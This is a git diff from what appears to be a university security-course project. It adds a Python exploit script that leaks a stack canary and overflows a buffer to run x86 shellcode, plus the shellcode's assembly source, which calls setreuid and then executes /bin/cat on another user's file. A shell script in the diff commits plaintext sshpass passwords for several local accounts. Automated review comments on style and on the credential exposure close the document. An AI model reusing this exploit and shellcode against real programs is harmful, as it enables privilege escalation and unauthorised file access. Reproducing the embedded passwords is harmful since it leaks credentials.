diff --git a/proj1/solution/interact4 b/proj1/solution/interact4
new file mode 100755
index 0000000000000000000000000000000000000000..2d70f7bd9702d4cfb9d486cc96a42dba083fab98
--- /dev/null
+++ b/proj1/solution/interact4
@@ -0,0 +1,72 @@
+#!/usr/bin/env python2
+
+from scaffold import *
+
+### YOUR CODE STARTS HERE ###
+import tempfile, subprocess
+def py3in2(func_text, arg):
+ # escape char in arg should be escaped twice.
+ payload = ['#/usr/bin/env python3', 'def _func(arg):']
+ for line in func_text.split('\n'):
+ payload.append(' ' + line)
+ payload.append('with open("/dev/fd/1", "w") as f:\n f.write(_func(\''+arg+'\'))\n')
+ payload = '\n'.join(payload)
+
+ with tempfile.NamedTemporaryFile() as tf:
+ tf.file.write(payload)
+ tf.file.close()
+ output = subprocess.check_output(["python3", tf.name], stderr=subprocess.PIPE)
+ return output
+
+def fuck_raddr(txt, rev=True):
+ def fuck8(txt):
+ assert(len(txt) == 8)
+ return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+
+ def revert(txt):
+ assert(len(txt) % 8 == 0)
+ res = ""
+ for i in range(int(len(txt) / 8)):
+ res += fuck8(txt[i*8:(i+1)*8])
+ return res
+
+ import binascii
+ if rev:
+ txt = revert(txt)
+ b = binascii.unhexlify(txt)
+ return b
+
+############# real code begin
+payload1 = '0123456789ab\\x' + '\n'
+p.send(payload1)
+reply1 = p.recvline()
+reply_canary = reply1[13:17]
+
+fill1 = "1"*16
+canary = reply_canary
+fill2 = "\0"*8
+retaddr = fuck_raddr("bffffaf4") # "bffffaf4"
+#payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f2f6c73682f62696e545b505389e131d2b00bcd800a", False) # SHELLCODE
+payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f636174682f62696e545b506841444d45682f2f524568652f6a7a682f686f6d545950515389e131d2b00bcd80", False) # SHELLCODE
+#payload = SHELLCODE
+
+msg = fill1 + canary + fill2 + retaddr + payload + '\n'
+#print(msg)
+p.send(msg)
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+
+# HINT: the last line of your exploit should look something like:
+# p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')
+# where m, canary, n and rip are all values you must determine
+
+### YOUR CODE ENDS HERE ###
+
+returncode = p.end()
+
+if returncode == -11: print 'segmentation fault or stack canary!'
+elif returncode != 0: print 'return code', returncode
+
diff --git a/proj1/solution/payload4.s b/proj1/solution/payload4.s
new file mode 100644
index 0000000000000000000000000000000000000000..6053d793a47c4f0b6c4c8c4148e7aa5700afb308
--- /dev/null
+++ b/proj1/solution/payload4.s
@@ -0,0 +1,58 @@
+// recolic: the shellcode provided by cs161 doesn't work.
+// so I have to rewrite it for proj1 problem4
+
+push $0x31
+pop %eax
+int $0x80
+mov %eax,%ebx
+mov %eax,%ecx
+push $0x46
+pop %eax
+int $0x80
+
+xor %eax,%eax
+
+// \0\0\0\0
+push %eax
+// /bin /cat
+push $0x7461632f
+push $0x6e69622f
+
+//mov %esp %ebx
+push %esp
+pop %ebx
+
+// \0\0\0\0
+push %eax
+// /hom e/jz //RE ADME
+push $0x454d4441
+push $0x45522f2f
+push $0x7a6a2f65
+push $0x6d6f682f
+
+//mov %esp %ecx
+push %esp
+pop %ecx
+
+
+//// \0\0\0\0
+//push %eax
+//// /bin //ls
+//push $0x736c2f2f
+//push $0x6e69622f
+//
+//push %esp
+//pop %ebx
+
+// \0\0\0\0 NULL
+push %eax
+// &arg[1]
+push %ecx
+// &arg[0]
+push %ebx
+
+mov %esp,%ecx
+xor %edx,%edx
+mov $0xb,%al
+int $0x80
+
diff --git a/proj1/ssh.sh b/proj1/ssh.sh
index cf5d074634db9ec39a965c989590b85bacaf9d20..a0e22d96aa70eee5a71e69ded40de1303c743ab3 100755
--- a/proj1/ssh.sh
+++ b/proj1/ssh.sh
@@ -7,5 +7,7 @@
 else
 echo 'Connecting localhost...'
 #sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no vsftpd@localhost -p 16161
 #sshpass -p 37ZFBrAPm8 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no smith@localhost -p 16161
- sshpass -p mXFLFR5C62 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no brown@localhost -p 16161
+ #sshpass -p mXFLFR5C62 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no brown@localhost -p 16161
+ sshpass -p cqkeuevfIO ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no jz@localhost -p 16161
+
 fi
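Review bot: `py3in2` is never called anywhere in this file, and it builds a Python program by splicing `arg` straight into a quoted source literal (`_func(\''+arg+'\')`), which the comment `# escape char in arg should be escaped twice.` admits is fragile: any quote or backslash in `arg` rewrites the generated program instead of being data. Delete the helper, or if it is kept pass `arg` through `sys.argv` or stdin rather than through source text. `fuck_raddr` also needs a descriptive name and a docstring since its contract is only recoverable by reading `fuck8`/`revert`; something like `def hex_to_bytes(txt, rev=True):` with `"""Hex-decode txt; with rev, reverse the byte order of each 8-hex-digit word."""`, and `import binascii` belongs at module top with the other imports. The long `payload` hex literal has no stated link to the `payload4.s` added in the same commit, so a comment naming that source file and the command that produced the bytes would keep the two from drifting apart; the `#payload = …` and `#print(msg)` leftovers should be removed rather than kept as alternatives.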
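Review bot: The header comment says the course-provided shellcode `doesn't work` but not why, so the next reader cannot tell which assumption this rewrite changed or whether it still applies; record the cause in the header, e.g. `// Rewritten because <reason — fill in>; differs from the provided version in <what — fill in>.` The `//// \0\0\0\0` … `//pop %ebx` block is commented-out code kept as a second variant and should be deleted, since the `payload4.s` file is the only record of what the hex literal in `interact4` actually contains. Nothing here states how the file is assembled and turned into that hex literal; a one-line comment with the assembler and extraction command would make the two files reproducible from each other. Minor style point: the comments `//mov %esp %ebx` / `//mov %esp %ecx` use a different operand separator than the real instructions (`mov %eax,%ebx`), which reads as a typo rather than a note.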
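Review bot: The new `sshpass -p … jz@localhost -p 16161` line passes the password on the command line, which exposes it to every local user through the process list, and committing it puts a plaintext credential into git history permanently alongside the three older passwords that are now preserved as comments. Read the secret from the environment or a file outside the repository instead, e.g. `sshpass -e ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no jz@localhost -p 16161` with `SSHPASS` exported by the caller (or `-f <path outside the repo>`), and remove the commented-out lines rather than keeping them as a running list of accounts and passwords. The blank line added just before `fi` looks unintentional. The enclosing `if`/`else` starts outside the hunk.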